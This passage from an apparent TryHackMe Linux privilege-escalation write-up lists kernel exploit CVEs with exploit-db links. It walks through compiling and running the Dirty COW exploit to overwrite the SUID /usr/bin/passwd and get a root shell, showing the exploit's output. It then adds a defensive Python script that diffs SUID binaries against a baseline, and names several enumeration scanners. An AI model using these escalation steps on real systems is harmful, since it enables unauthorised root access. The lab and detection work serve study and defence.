Source: http://www.exploit-db.com/exploits/15285
[13] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[14] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
One of the most popular kernel exploits, known as "Dirty C0W", is listed at number 3. The source code for this exploit is available at /home/user/tools/kernel-exploits/dirtycow/ and it is named c0w.c. This exploit uses the kernel vulnerability to overwrite the SUID binary /usr/bin/passwd with one that spawns a root shell.
- Compile the code and run it (note that it might take several minutes to complete):
user@debian:~$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~$ ./c0w
(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 74d5f000
madvise 0
ptrace 0
- Once compiled and exploited, simply run /usr/bin/passwd and it will drop you into a root shell:
user@debian:~$ /usr/bin/passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
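Two of the tell-tale artefacts in this room are a SUID binary that should not exist (`/tmp/rootbash`, also dropped via NFS earlier) and a SUID binary whose contents changed (`/usr/bin/passwd` after Dirty COW). Both fall out of a baseline-and-diff over the SUID inventory, which is how a defender catches this after the fact. The block below is an added example (my own code, not the room's): it records path and SHA-256 for every setuid file under a root, then reports new, modified and removed entries against a saved baseline. The demo tree is constructed in a temp directory with placeholder scripts; it keys on the setuid bit alone because the demo files are owned by whoever runs it, whereas a real run would also require `st_uid == 0`.

```python
"""Baseline-and-diff check for SUID binaries.

Added example, not code from the TryHackMe room. build_demo() constructs a
placeholder tree, takes a baseline, then simulates the two changes seen in
the writeup: /usr/bin/passwd replaced and a SUID copy of bash in /tmp.
"""
import hashlib
import os
import stat
import tempfile


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def suid_inventory(root):
    """Map relative path -> sha256 for every regular file under root with setuid set.

    In production also filter on st.st_uid == 0 (SUID root) and skip /proc, /sys.
    """
    inv = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                inv[os.path.relpath(path, root)] = sha256_of(path)
    return inv


def diff_inventory(baseline, current):
    """Return {'new': [...], 'modified': [...], 'removed': [...]} relative to baseline."""
    return {
        "new": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "removed": sorted(p for p in baseline if p not in current),
    }


def build_demo():
    """Construct a tree, take a baseline, then simulate the tampering (constructed data)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.makedirs(os.path.join(root, "tmp"))
    passwd = os.path.join(root, "usr", "bin", "passwd")
    with open(passwd, "wb") as fh:
        fh.write(b"#!/bin/sh\necho original passwd placeholder\n")
    os.chmod(passwd, 0o4755)
    baseline = suid_inventory(root)

    # simulate: passwd overwritten (the kernel clears setuid on write by an
    # unprivileged user, so the bit is set again as an exploit would leave it)
    with open(passwd, "wb") as fh:
        fh.write(b"#!/bin/sh\necho replaced placeholder\n")
    os.chmod(passwd, 0o4755)
    # simulate: a SUID copy of bash dropped in /tmp
    rootbash = os.path.join(root, "tmp", "rootbash")
    with open(rootbash, "wb") as fh:
        fh.write(b"#!/bin/sh\necho placeholder for a SUID bash copy\n")
    os.chmod(rootbash, 0o4755)
    return root, baseline


if __name__ == "__main__":
    demo_root, base = build_demo()
    for kind, paths in diff_inventory(base, suid_inventory(demo_root)).items():
        print(f"{kind}: {paths}")
```

On a Debian host the package manager can play the baseline for packaged files (`dpkg --verify`), but it knows nothing about `/tmp/rootbash`, which is why the inventory over the whole filesystem is the check that actually catches both cases.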
Task 21 – Privilege Escalation Scripts
This task was purely running tools such as linPEAS, Linux Smart Enumeration and linEnum to see if the exploits above showed up… without attaching some SUPER LONG output from some of these above tools, let’s just say over all three they covered pretty much everything AND MORE. This is one of the core reasons that one of my personal first moves when getting onto a box is to run at least one of these and go from there. 😉
- linPEAS – The most popular and advanced Linux privilege escalation scanner on the market!
- Linux Smart Enumeration – A very thorough and detailed PrivEsc method scanner; you can control how much detail it outputs!
- linEnum – The original Linux PrivEsc checker, although now deprecated by the above two (and abandoned as of 2 years ago).